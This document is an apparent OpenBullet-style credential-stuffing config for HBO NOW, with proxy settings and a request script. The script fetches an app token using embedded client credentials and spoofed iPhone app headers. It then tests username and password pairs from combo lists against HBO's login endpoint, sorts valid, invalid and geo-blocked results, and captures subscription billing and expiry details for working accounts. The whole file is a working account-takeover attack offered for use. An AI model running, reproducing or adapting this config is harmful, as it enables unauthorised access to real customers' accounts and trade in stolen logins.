[SETTINGS]
{
  "Name": "HBO NOW",
  "SuggestedBots": 10,
  "MaxCPM": 0,
  "LastModified": "2019-08-18T14:46:33.8220054+02:00",
  "AdditionalInfo": "US Proxies ONLY - Verifies it on Key Check",
  "Author": "✘-Gunpoint69",
  "Version": "1.3.7 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET_TOKEN REQUEST POST "https://comet.api.hbo.com/tokens" 
  CONTENT "{\"client_id\":\"7e278f74-d580-4292-b3a9-f7a023e5ca03\",\"client_secret\":\"7e278f74-d580-4292-b3a9-f7a023e5ca03\",\"scope\":\"browse video_playback_free account_registration\",\"grant_type\":\"client_credentials\",\"deviceSerialNumber\":\"b1c15492-7d2b-4457-bf91-e018ebd7\",\"clientDeviceData\":{\"paymentProviderCode\":\"apple\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: HBO%20NOW/21.2.8 Anomaly.161 CFNetwork/897.15 Darwin/17.5.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.hbo.v9.full+json" 
  HEADER "Host: comet.api.hbo.com" 
  HEADER "X-Hbo-Client-Version: Hadron/21.2.8 Anomaly.161 ios (IPHONE/12.0.1)" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: br, gzip, deflate" 

#✘-Gunpoint69 KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "\"geo_blocked\"" 
  KEYCHAIN Success OR 
    KEY "\"access_token\":\"" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "TOKEN" 

#LOGIN REQUEST POST "https://comet.api.hbo.com/tokens" 
  CONTENT "{\"grant_type\":\"user_name_password\",\"scope\":\"browse video_playback device elevated_account_management\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: HBO%20NOW/21.2.8 Anomaly.161 CFNetwork/897.15 Darwin/17.5.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.hbo.v9.full+json" 
  HEADER "Host: comet.api.hbo.com" 
  HEADER "X-Hbo-Client-Version: Hadron/21.2.8 Anomaly.161 ios (IPHONE/12.0.1)" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept-Language: en-us" 
  HEADER "Authorization: Bearer <TOKEN>" 
  HEADER "Accept-Encoding: br, gzip, deflate" 

#✘-Gunpoint69 KEYCHECK 
  KEYCHAIN Success AND 
    KEY "access_token" 
    KEY "eyJ" 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Failure OR 
    KEY "invalid_credentials" 
    KEY "<RESPONSECODE>" Contains "401" 
  KEYCHAIN Ban OR 
    KEY "\"geo_blocked\"" 

#TOKEN_1 PARSE "<SOURCE>" JSON "access_token" -> VAR "TOKEN1" 

#✘-Gunpoint69 REQUEST POST "https://comet.api.hbo.com/content" 
  CONTENT "[{\"id\":\"urn:hbo:billing-status:mine\"}]" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: HBO%20NOW/21.2.8 Anomaly.161 CFNetwork/897.15 Darwin/17.5.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.hbo.v9.full+json" 
  HEADER "Host: comet.api.hbo.com" 
  HEADER "X-Hbo-Client-Version: Hadron/21.2.8 Anomaly.161 ios (IPHONE/12.0.1)" 
  HEADER "Authorization: Bearer <TOKEN1>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "You’re not subscribed to HBO NOW" 

PARSE "<SOURCE>" LR "Your HBO NOW subscription is billed through [" "](strong" -> CAP "Billed Through" 

#✘-Gunpoint69 PARSE "<SOURCE>" LR "nYour subscription is paid through [" "T" -> CAP "Expire Date" "" " ✘-Gunpoint69" 

